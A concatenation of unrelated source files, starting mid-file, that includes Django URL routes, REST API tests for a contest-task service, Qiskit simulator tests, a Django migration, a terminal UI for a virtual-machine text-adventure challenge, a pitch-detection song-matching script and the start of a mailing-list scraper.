url(r'^recordings/(?P<recording_id>[\w-]+)$', 'recording.recording_details', name='recording_details'),
url(r'^recordings/(?P<recording_id>[\w-]+)/live$', 'recording.recording_live', name='recording_live'),
url(r'^recordings/(?P<recording_id>[\w-]+)/start$', 'recording.recording_start', name='recording_start'),
url(r'^recordings/(?P<recording_id>[\w-]+)/stop$', 'recording.recording_stop', name='recording_stop'),
url(r'^recordings/update/$', 'recording.recording_update', name='recording_update'),
url(r'^recordings/new/$', 'recording.recording_new', name='recording_new'),
url(r'^ajax/traffic/$', 'ajax_traffic', name='ajax_traffic'),
url(r'^logs/$', LogsView.as_view(), name='logs'),
url(r'^settings/$', 'settings_view', name='settings'),
)
|
from rest_framework.test import APIClient, APITestCase
from rest_framework import status
from django.contrib import auth
from django.contrib.auth.models import Group
from contest.models import Contest, Task, TestCase
import datetime
class TaskTestCase(APITestCase):
@classmethod
def setUpTestData(cls):
verified_users_group = Group.objects.create(name='Verified Users')
contest = Contest.objects.create(
title='TestTitle1',
description='TestDescription1',
start_time=datetime.datetime.now(),
duration=datetime.timedelta(hours=2),
)
Contest.objects.create(
title='TestTitle2',
description='TestDescription2',
start_time=datetime.datetime.now(),
duration=datetime.timedelta(hours=2),
)
past_contest = Contest.objects.create(
title='Past Contest',
description='Past Contest',
start_time=datetime.datetime.now() - datetime.timedelta(hours=2),
duration=datetime.timedelta(hours=1),
)
future_contest = Contest.objects.create(
title='Future Contest',
description='Future Contest',
start_time=datetime.datetime.now() + datetime.timedelta(hours=2),
duration=datetime.timedelta(hours=1),
)
Task.objects.create(
title='TestTitle1',
content='TestContent1',
contest=contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='TestTitle2',
content='TestContent2',
contest=contest,
ml=512,
tl=5,
_order=1,
)
Task.objects.create(
title='TestTitle3',
content='TestContent3',
contest=contest,
ml=512,
tl=5,
_order=2,
)
Task.objects.create(
title='PastTitle',
content='PastContent',
contest=past_contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='FutureTitle1',
content='FutureContent1',
contest=future_contest,
ml=512,
tl=5,
_order=0,
)
Task.objects.create(
title='FutureTitle2',
content='FutureContent2',
contest=future_contest,
ml=512,
tl=5,
_order=1,
)
cls.user = auth.get_user_model().objects.create(
username='TestUsername',
email='TestEmail',
)
cls.user.set_password('TestPassword')
cls.user.text_password = 'TestPassword'
cls.user.groups.add(verified_users_group)
cls.user.save()
cls.admin = auth.get_user_model().objects.create(
username='TestAdminUsername',
email='TestAdminEmail',
is_staff=True,
)
cls.admin.set_password('TestAdminPassword')
cls.admin.text_password = 'TestAdminPassword'
cls.admin.groups.add(verified_users_group)
cls.admin.save()
cls.result_keys = ('id', 'title', 'content', 'contest', 'tl', 'ml', 'samples')
@staticmethod
def authorize(user):
sign_in_data = {
'username': user.username,
'password': user.text_password,
}
client = APIClient()
response = client.post('/api/token-auth', data=sign_in_data, format='json')
token = response.data['token']
client.credentials(HTTP_AUTHORIZATION='JWT ' + token)
return client
def test_unauthorized_head(self):
client = APIClient()
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_authorized_head(self):
client = self.authorize(self.user)
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_admin_head(self):
client = self.authorize(self.admin)
response = client.head('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_unauthorized_list(self):
client = APIClient()
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_authorized_list(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_admin_list(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 6)
for result in response.data['results']:
self.assertEqual(tuple(result.keys()), self.result_keys)
def test_list_filter(self):
client = APIClient()
response = client.get('/api/tasks/?title=TestTitle1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 1)
def test_list_search(self):
client = APIClient()
response = client.get('/api/tasks/?search=Content1')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['count'], 2)
def test_unauthorized_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
}
client = APIClient()
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authorized_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
}
client = self.authorize(self.user)
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_create(self):
new_task_data = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 1,
'_order': 3,
'test_cases': [
{
'input': '0 0',
'output': '0',
},
{
'input': '0 1',
'output': '1',
},
{
'input': '1 1',
'output': '1',
}
]
}
client = self.authorize(self.admin)
response = client.post('/api/tasks/', data=new_task_data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Task.objects.count(), 7)
self.assertEqual(Task.objects.get(id=7).title, 'NewTestTitle')
self.assertEqual(Task.objects.get(id=7).content, 'NewTestContent')
self.assertEqual(Task.objects.get(id=7).contest, Contest.objects.get(id=1))
self.assertEqual(Task.objects.get(id=7).ml, 2**28)
self.assertEqual(Task.objects.get(id=7).tl, 2)
def test_unauthorized_retrieve(self):
client = APIClient()
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_authorized_retrieve(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_admin_retrieve(self):
client = self.authorize(self.user)
response = client.get('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_non_existent_retrieve(self):
client = APIClient()
response = client.get('/api/tasks/0/')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\
def test_unauthorized_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = APIClient()
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
def test_authorized_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = self.authorize(self.user)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
def test_admin_partial_update(self):
updates = {
'title': 'NewTitle1',
}
client = self.authorize(self.admin)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Task.objects.get(id=1).title, 'NewTitle1')
self.assertEqual(Task.objects.get(id=1).content, 'TestContent1')
self.assertEqual(tuple(response.data.keys()), self.result_keys)
def test_admin_partial_wrong_contest_update(self):
updates = {
'contest': 0,
}
client = self.authorize(self.admin)
response = client.patch('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertNotEqual(Task.objects.get(id=1).contest.id, 0)
def test_unauthorized_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
}
client = APIClient()
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertNotEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertNotEqual(Task.objects.get(id=1).contest.id, 2)
def test_authorized_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
}
client = self.authorize(self.user)
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertNotEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertNotEqual(Task.objects.get(id=1).contest.id, 2)
def test_admin_update(self):
updates = {
'title': 'NewTestTitle',
'content': 'NewTestContent',
'contest': 2,
'_order': 0,
}
client = self.authorize(self.admin)
response = client.put('/api/tasks/1/', data=updates, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNone(response.data)
self.assertEqual(Task.objects.get(id=1).title, 'NewTestTitle')
self.assertEqual(Task.objects.get(id=1).content, 'NewTestContent')
self.assertEqual(Task.objects.get(id=1).contest.id, 2)
def test_unauthorized_destroy(self):
client = APIClient()
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authorized_destroy(self):
client = self.authorize(self.user)
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_admin_destroy(self):
client = self.authorize(self.admin)
response = client.delete('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_common_options(self):
allowed_headers = ('Allow', 'GET, POST, HEAD, OPTIONS')
client = APIClient()
response = client.options('/api/tasks/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response._headers['allow'], allowed_headers)
def test_detail_options(self):
allowed_headers = ('Allow', 'GET, PUT, PATCH, DELETE, HEAD, OPTIONS')
client = APIClient()
response = client.options('/api/tasks/1/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response._headers['allow'], allowed_headers)
|
# -*- coding: utf-8 -*-
# Copyright 2019, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
"""
QasmSimulator Integration Tests
"""
import multiprocessing
from test.terra.utils import common
from test.terra.utils import ref_qvolume
from qiskit import compile
from qiskit.providers.aer import QasmSimulator
class QasmThreadManagementTests(common.QiskitAerTestCase):
"""QasmSimulator thread tests."""
SIMULATOR = QasmSimulator()
def test_qasm_default_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = 100
circuit = ref_qvolume.quantum_volume(4, final_measure=True)
qobj = compile(circuit, self.SIMULATOR, shots=shots)
backend_opts = {}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], 1, msg="default parallel_experiments should be 1")
self.assertEqual(result.metadata['parallel_shots'], 1, msg="default parallel_shots should be 1")
self.assertEqual(result.metadata['parallel_state_update'], multiprocessing.cpu_count(), msg="default parallel_state_update should be same with multiprocessing.cpu_count()")
def test_qasm_shot_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = multiprocessing.cpu_count()
circuit = ref_qvolume.quantum_volume(4, final_measure=True)
qobj = compile(circuit, self.SIMULATOR, shots=shots)
backend_opts = {'max_parallel_shots': shots}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], 1, msg="default parallel_experiments should be 1")
self.assertEqual(result.metadata['parallel_shots'], multiprocessing.cpu_count(), msg="parallel_shots must be multiprocessing.cpu_count()")
self.assertEqual(result.metadata['parallel_state_update'], 1, msg="parallel_state_update should be 1")
def test_qasm_experiments_parallelization(self):
"""Test statevector method is used for Clifford circuit"""
# Test circuit
shots = 100
experiments = multiprocessing.cpu_count()
circuits = []
for i in range(experiments):
circuits.append(ref_qvolume.quantum_volume(4, final_measure=True))
qobj = compile(circuits, self.SIMULATOR, shots=shots)
backend_opts = {'max_parallel_experiments': experiments}
result = self.SIMULATOR.run(qobj, backend_options=backend_opts).result()
if result.metadata['omp_enabled']:
self.assertEqual(result.metadata['parallel_experiments'], multiprocessing.cpu_count(), msg="parallel_experiments should be multiprocessing.cpu_count()")
self.assertEqual(result.metadata['parallel_shots'], 1, msg="parallel_shots must be 1")
self.assertEqual(result.metadata['parallel_state_update'], 1, msg="parallel_state_update should be 1")
|
# Generated by Django 2.2.4 on 2019-10-15 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crud_lugar', '0004_auto_20191015_1501'),
]
operations = [
migrations.AlterField(
model_name='evento',
name='hora_fin',
field=models.TimeField(null=True),
),
migrations.AlterField(
model_name='evento',
name='hora_ini',
field=models.TimeField(null=True),
),
migrations.AlterField(
model_name='foto',
name='ruta',
field=models.FileField(null=True, upload_to='myfolder/'),
),
]
|
import sys
import os
import datetime
import pickle
import textwrap
from prompt_toolkit import Application
from prompt_toolkit.layout.containers import VSplit, HSplit, Window
from prompt_toolkit.layout.controls import BufferControl, FormattedTextControl
from prompt_toolkit.layout.margins import ScrollbarMargin
from prompt_toolkit.buffer import Buffer, reshape_text
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.layout import Dimension, ScrollOffsets
from prompt_toolkit.widgets import Label, TextArea, Box
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.layout.processors import TabsProcessor
from prompt_toolkit.key_binding.bindings.scroll import (
scroll_backward,
scroll_forward,
scroll_half_page_down,
scroll_half_page_up,
scroll_one_line_down,
scroll_one_line_up,
scroll_page_down,
scroll_page_up,
)
import datafiles
import machine
shortcuts = {
"n" : "north",
"s" : "south",
"e" : "east",
"w" : "west",
"u" : "up",
"d" : "down",
"i" : "inv",
"l" : "look"
}
def help():
output = [
"All of this might break things.",
"-------------------------------------",
"\\save <name>: saves game to ",
" ./saves/<name>.bin",
"\\load <name>: loads game from ",
" ./saves/<name>.bin",
"\\mon: toggles memory monitoring",
"\\wmem <loc> <val>: writes memory",
"\\rmem <start> <end>: reads memory",
"\\dreg: dumps all register values",
"\\sreg <reg> <val>: sets a register",
"\\warp <loc>: warps around the world",
"\\dis <n>: disassemble the next <n>",
" instructions to a file",
" at ./disassembly.txt",
"\\disp <n>: disassemble and pause"
" at the end of it",
]
debug_text.buffer.text = "\n".join(output)
def save(fname):
if not os.path.exists("./saves"):
os.mkdir("./saves")
fpath = os.path.join("./saves", fname)
debug_text.buffer.text = f"Saving to {fpath}..."
with open(fpath, "wb") as save_file:
computer.core_dump(save_file)
def load(fname):
fpath = os.path.join("./saves", fname)
if not os.path.exists(fpath):
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: No such file.", 35))
return
debug_text.buffer.text = f"Loading from {fpath}..."
with open(fpath, "rb") as save_file:
computer.load_core_dump(save_file)
memory_monitor = False
def mon():
global memory_monitor
memory_monitor = not memory_monitor
def wmem(loc, val):
if (not loc.isdigit()) or (not val.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations and values must be 15-bit uints", 35))
return
loc = int(loc)
val = int(val)
if loc < 0 or val < 0 or loc > 32676 or val > 32676:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations and values must be 15-bit uints.", 35))
return
computer.mem[loc] = val
rmem(str(loc))
def rmem(start, stop=None):
if stop == None:
stop = start
if (not start.isdigit()) or (not stop.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations must be 15-bit uints", 35))
return
start = int(start)
stop = int(stop)
if start < 0 or stop < 0 or start > 32676 or stop > 32676:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Memory locations must be 15-bit uints", 35))
return
if stop < start:
start, stop = stop, start
out = ""
while start <= stop:
out += f"{start}: {computer.mem[start]}\n"
start += 1
debug_text.buffer.text = out
def dreg():
out = "registers:\n"
for i, r in enumerate(computer.registers):
out += f"\t{i}:\t{r}\n"
debug_text.buffer.text = out
def sreg(reg, val):
if (not reg.isdigit()) or (not val.isdigit()):
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Register indices and values must be integers", 35))
return
reg = int(reg)
val = int(val)
if reg < 0 or reg >= len(computer.registers):
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: Invalid register index.", 35))
return
if val <0 or val > 32767:
debug_text.buffer.text = "\n".join(textwrap.wrap("ERROR: Registers hold 15-bit uints.", 35))
return
computer.registers[reg] = val
dreg()
def warp(loc_idx):
if not loc_idx.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Warp locations must be integers", 35))
return
loc_idx = int(loc_idx)
computer.mem[2732] = loc_idx
computer.mem[2733] = loc_idx
# disassemble the next N instructions
def dis(count):
if not count.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Disassembly count must be integer", 35))
return
count = int(count)
computer.dissassembly_count = count
# disassemble the next N instructions and then pause
def disp(count):
if not count.isdigit():
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: Disassembly count must be integer", 35))
return
count = int(count)
computer.dissassembly_count = count
computer.ticks = count
def pre_parse(cmd):
parts = cmd.split(" ")
if cmd.startswith("\\"):
f = globals().get(parts[0][1:], None)
if f:
f(*parts[1:])
return None
else:
debug_text.buffer.text = "\n".join(textwrap.wrap(f"ERROR: No such command '{parts[0]}'", 35))
return None
if parts[0] in shortcuts.keys():
parts[0] = shortcuts[parts[0]]
cmd = " ".join(parts)
if not cmd.endswith("\n"):
cmd += "\n"
return cmd
raw_output = ""
class UIPrinter:
def __init__(self, target: Buffer, win: Window):
self.target = target
self.win = win
def accept_output(self, val):
global raw_output
raw_output += chr(val)
self.target.text += chr(val)
self.target.cursor_position = len(self.target.text)
def diff_mem(mem1, mem2):
diffs = []
if len(mem1) != len(mem2):
print(f"WARNING: Memory not the same size. ({len(mem1)} vs {len(mem2)}) Diffs will be null.")
return diffs
for mi in range(len(mem1)):
if mem1[mi] == mem2[mi]:
continue
diffs.append((mi, mem1[mi], mem2[mi]))
return diffs
def format_diffs(hist, idx1, idx2, regs=False, mem=True):
out = ""
m1 = hist[idx1]
m2 = hist[idx2]
reg_diffs = diff_mem(m1["registers"], m2["registers"])
mem_diffs = diff_mem(m1["memory"], m2["memory"])
out += f"'{m2['history'][-1]}' changes:\n"
if regs:
if len(reg_diffs) == 0:
out += "\tregisters: [none]\n"
else:
out += "\tregisters:\n"
for rd in reg_diffs:
out += f"\t\t{rd[0]}: {rd[1]}\t->\t{rd[2]}\n"
if mem:
if len(mem_diffs) == 0:
out += "\tmemory: [none]\n"
else:
out += "\tmemory:\n"
for md in mem_diffs:
out += f"\t\t{md[0]}: {md[1]}\t->\t{md[2]}"
if md[2] >= 32 and md[2] < 127:
out += f"\t({chr(md[2])})"
out += "\n"
return out
def wrap_output():
_, width = os.popen("stty size", "r").read().split()
width = int(width) - 43
formed = ["\n".join(textwrap.wrap(l, width)) for l in raw_output.splitlines()]
output_buffer.text = "\n".join(formed)
def inp_handler(buff):
global raw_output
if not buff.text.startswith("\\"):
raw_output += f"> {buff.text}\n\n"
output_buffer.text += f"> {buff.text}\n\n"
inp = pre_parse(buff.text)
if inp:
cmd_history.append(inp.strip())
computer.input_buffer = inp
computer.run()
wrap_output()
state_stack.append({
"history": cmd_history.copy(),
"registers": computer.registers.copy(),
"memory": computer.mem.copy()
})
if memory_monitor:
fdiffs = format_diffs(state_stack, -2, -1)
debug_text.buffer.text = fdiffs
if not computer.waiting_for_input:
output_buffer.text += "\n\n[Game exited]\n"
output_buffer.cursor_position = len(output_buffer.text)
output_buffer = Buffer("")
output_window = Window(
BufferControl(buffer=output_buffer, input_processors=[]),
wrap_lines=True,
right_margins=[ScrollbarMargin()],
always_hide_cursor=True,
allow_scroll_beyond_bottom=True,
)
prompt_history = InMemoryHistory()
input_prompt = TextArea("", multiline=False, height=Dimension(max=1), history=prompt_history, accept_handler=inp_handler, prompt="> ")
debug_text = BufferControl(Buffer(""), input_processors=[TabsProcessor(char1=" ", char2=" ")])
root = VSplit(
[
HSplit(
[
output_window,
input_prompt
],
padding_char="-", padding=1,
),
Box(body=Window(content=debug_text, wrap_lines=True), width=Dimension(min=40, max=40), padding_left=1, padding_top=0, padding_bottom=0, padding_right=1),
],
padding_char="‖", padding=1
)
root_layout = Layout(root)
kb = KeyBindings()
@kb.add('c-d')
def exit_(event):
event.app.exit()
@kb.add('c-w')
def output_up_(event):
root_layout.focus(output_buffer)
scroll_half_page_up(event)
root_layout.focus(input_prompt)
@kb.add('c-s')
def output_up_(event):
root_layout.focus(output_buffer)
scroll_half_page_down(event)
root_layout.focus(input_prompt)
computer = machine.CPU()
if "--run-self-test" not in sys.argv:
# load up machine after self-tests done
computer.load_core_dump(datafiles.get("start.sav"))
else:
program = machine.CPU.read_program_from_bin(datafiles.get("challenge.bin"))
computer.load_program(program)
computer.stdout = UIPrinter(output_buffer, output_window)
cmd_history = []
state_stack = []
state_stack.append({
"history": cmd_history.copy(),
"registers": computer.registers.copy(),
"memory": computer.mem.copy()
})
computer.run()
debug_text.buffer.text = "Controls:\n\nType things and hit return.\n\nCtrl+W/S scrolls the output \nwindow.\n\nCtrl-D to quit.\n\nUse \\help to see meta commands."
wrap_output()
root_layout.focus(input_prompt)
app = Application(layout=root_layout, key_bindings=kb, full_screen=True)
app.run()
# if not os.path.exists("./history"):
# os.mkdir("./history")
# hname = f"{datetime.datetime.now().isoformat()}.pickle"
# with open(os.path.join("./history", hname), "wb") as out:
# pickle.dump(state_stack, out)
|
# Based on audio_to_midi_melodia github repo by Justin Salamon <justin.salamon@nyu.edu>
import time
import argparse
import os
import numpy as np
from scipy.signal import medfilt
#import __init__
import pyaudio
import sys
import aubio
from aubio import sink
from songmatch import *
from song import *
from operator import itemgetter
from pprint import PrettyPrinter
pp = PrettyPrinter(indent=4)
#from wavplayer import *
from scipy.io.wavfile import read
def convert_durations(ds):
start_time = ds[0][0]
durations = []
for i,d in enumerate(ds):
if i+1 < len(ds):
durations.append(d[1]-start_time)
return durations
# pyaudio params
wf = read('twinkle.wav')[1]
buffer_size = 1024
pyaudio_format = pyaudio.paFloat32
n_channels = 1
samplerate = 44100
seconds_per_sample = buffer_size / samplerate
# setup aubio
tolerance = 0.2
win_s = 4096 # fft size
hop_s = buffer_size # hop size
pitch_o = aubio.pitch("default", win_s, hop_s, samplerate)
pitch_o.set_unit("midi")
pitch_o.set_tolerance(tolerance)
# setup aubio recording (for debugging)
record_output_fn = 'record_output.wav'
g = sink(record_output_fn, samplerate=samplerate)
# pitch detection parameters
thresh_high = 100
thresh_low = 1
start_len = 2
pitch_diff_thresh = 1.5
note_min_len = 5
pitches = [[]]
durations = [[]] # durations = [[t_start, t_end]...]
seq = []
start = True
UDS = False
start_note = None
time_counter = 0 # time recorded so far (in seconds)
keydiff = None
temporatio = None
startpt = None
# song-matcher setup
# songs = {'Twinkle Twinkle Little Star':[0,7,0,2,0,-2,-2,0,-1,0,-2,0,0,0,-2,7,0,-2,0,-1,0,-2,5,0,-2,0,-1,0,-2,-2,0,7,0,2,0,-2,-2,0,-1,0,-2,0,-2],
# 'Three Blind Mice':[-2,-2,4,-2,-2,7,-2,0,-1,3,-2,0,-1,3,5,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,-2,-1,-2,-2,4,-2,-2,4,-2,-2,7,-2,0,-1,3,-2,0,-1,3,5,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,5,0,0,-1,-2,2,1,-5,0,0,-2,-1,-2,-2]}
# timestamps = {'Twinkle Twinkle Little Star':[0.49991319444444443, 1.0040273401027078, 1.508141485760971, 2.0122556314192344, 2.516369777077498, 3.020483922735761, 4.0287122140522875, 4.532826359710551, 5.036940505368814, 5.541054651027078, 6.04516879668534, 6.297225869514473, 6.549282942343604, 6.801340015172736, 7.0533970880018675, 7.8641806722689065, 8.565739524976657, 9.06985367063492, 9.573967816293184, 10.078081961951447, 10.582196107609711, 11.086310253267973, 12.0945385445845, 12.598652690242764, 13.102766835901026, 13.606880981559291, 14.110995127217553, 14.615109272875818, 15.11922341853408, 16.127451709850607, 16.63156585550887, 17.135680001167135, 17.6397941468254, 18.14390829248366, 18.648022438141922, 19.152136583800186, 20.160364875116713, 20.664479020774976, 21.16859316643324, 21.672707312091504, 22.176821457749767, 22.68093560340803, 23.18504974906629, 23.995833333333337]}
# start_notes = {'Twinkle Twinkle Little Star': 65}
# wav_files = {'Twinkle Twinkle Little Star':'./musicbank/twinkle.wav',
# 'Three Blind Mice': './musicbank/three_blind_mice.wav'}
# song database
allSongNames = ["twinkle","london_bridge","three_blind_mice","boat","lullaby","mary_had_a_little_lamb"]
songdb = SongDatabase(allSongNames)
songdb.preprocessMelodies()
songs = songdb.getAllMelody()
start_notes = songdb.getAllFirstNode()
timestamps = songdb.getAllTimestamps()
# song matcher
song_matcher = SongsMatchNew(songs, timestamps)
# initialise pyaudio
p = pyaudio.PyAudio()
def append_new(l, n, d, tc, note_min_len=5):
if len(l[-1]) <= note_min_len:
l.pop()
d.pop()
else:
l[-1] = np.mean(l[-1])
d[-1].append(tc)
l.append(n)
d.append([tc])
return l, d
def process_audio(in_data, frame_count, time_info, status):
''' callback function for pyaudio'''
global start
global pitches
global seq
global start_note
global time_counter
global durations
global keydiff
global temporatio
global startpt
global wf
time_counter += seconds_per_sample
if wf is not None:
signal = np.array(wf[:frame_count], dtype=np.float32)
if len(signal) < frame_count:
return (in_data, pyaudio.paComplete)
wf = wf[frame_count:]
else:
signal = np.fromstring(in_data, dtype=np.float32)
pitch = pitch_o(signal)[0]
confidence = pitch_o.get_confidence()
# process pitch information
if (pitch < thresh_low or pitch > thresh_high) and not start:
start = True
pitches, durations = append_new(pitches, [], durations, time_counter)
if pitch > thresh_low and pitch < thresh_high:
start = False
if len(pitches[-1]) < start_len and abs(pitch - pitches[-1]) > pitch_diff_thresh:
pitches[-1] = [pitch]
durations[-1] = [time_counter] # reset note-start time
else:
if abs(pitch - np.mean(pitches[-1])) > pitch_diff_thresh:
pitches, durations = append_new(pitches, [pitch], durations, time_counter)
else:
pitches[-1].append(pitch)
if not durations[-1]: # if start note
durations[-1] = [time_counter]
# if note ends
if len(pitches) > 2 :
if not seq: # if seq empty
start_note = pitches[-3]
if UDS:
if (pitches[-2] - pitches[-3]) > 1.0:
seq.append("U")
elif abs(pitches[-2] - pitches[-3]) <= 1.0:
seq.append("S")
else:
seq.append("D")
else:
seq.append(int(pitches[-2]-pitches[-3]))
pitches.pop(0)
# add the obtained note to song_matcher to get probability
song_matcher.addNote([seq[-1]])
scores = song_matcher.getProbDic()
#pp.pprint(scores)
if max(scores.values()) > 0.8: # if confident enought about song
song = sorted(scores.items(), key=itemgetter(1))[-1][0]
converted_durations = convert_durations(durations)
keydiff, temporatio, startpt = song_matcher.getKeyTempo(song, start_notes[song], start_note, converted_durations)
print("+++++++++++++")
print("key difference: %f" %keydiff)
print("tempo ration: %f" %temporatio)
print("start point: %f" %startpt)
print("song: %s" %song)
print("+++++++++++++")
# WavPlayer(wav_files[song])
# return (in_data, pyaudio.paComplete)
g(signal, hop_s)
return (in_data, pyaudio.paContinue)
# open stream
stream = p.open(format=pyaudio_format,
channels=n_channels,
rate=samplerate,
input=True,
frames_per_buffer=buffer_size,
stream_callback=process_audio)
print("*** starting recording")
stream.start_stream()
while stream.is_active():
try:
time.sleep(0.1)
except KeyboardInterrupt:
print("*** Ctrl+C pressed, exiting")
break
print("*** done recording")
stream.stop_stream()
stream.close()
p.terminate()
print(start_note)
print(durations)
print(seq)
print(keydiff, temporatio, startpt)
# 'london Bridge is Falling Down':'UDDDUUDUUDUUSUDDDUUDUDDUUDDDUUDUUDUUSUDDDUUDUDD',
# 'Lullaby':'SUDSUDUUDDSDDUUDUUDUUDDUUDSUDDUDDUUUDDSUDDUDDUDDSD',
# 'Mary has a little lamb':'DDUUSSDSSUSSDDDUUSSDSUDDUDDUUSSDSSUSSDDDUUSSDSUDD'}
song_matcher = SongsMatchNew(songs)
song_matcher.addNotes(seq)
scores = song_matcher.getProbDic()
print("+++++++++++++++++++++++++++++++")
print(sorted(scores.items(), key=itemgetter(1))[-1][0])
print("+++++++++++++++++++++++++++++++")
|
from tqdm import tqdm
import time
import logging
import os
import email
from abc import ABC, abstractmethod
import mailbox
from mailbox import mboxMessage
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
import numpy as np
import pandas as pd
import requests
import yaml
from bs4 import BeautifulSoup
from config.config import CONFIG
from bigbang.utils import get_paths_to_files_in_directory
import bigbang.bigbang_io as bio
from bigbang.data_types import Message, MailList
from bigbang.ingress.utils import (
get_website_content,
get_auth_session,
set_website_preference_for_header,
)
filepath_auth = CONFIG.config_path + "authentication.yaml"
directory_project = str(Path(os.path.abspath(__file__)).parent.parent)
logging.basicConfig(
filename=directory_project + "/abstract.scraping.log",
filemode="w",
level=logging.INFO,
format="%(asctime)s %(message)s",
)
logger = logging.getLogger(__name__)
class AbstractMessageParserWarning(BaseException):
"""Base class for AbstractMessageParser class specific exceptions"""
pass
class AbstractMailListWarning(BaseException):
"""Base class for AbstractMailList class specific exceptions"""
pass
class AbstractMailListDomainWarning(BaseException):
"""Base class for AbstractMailListDomain class specific exceptions"""
pass
class AbstractMessageParser(ABC):
"""
This class handles the creation of an mailbox.mboxMessage object
(using the from_*() methods) and its storage in various other file formats
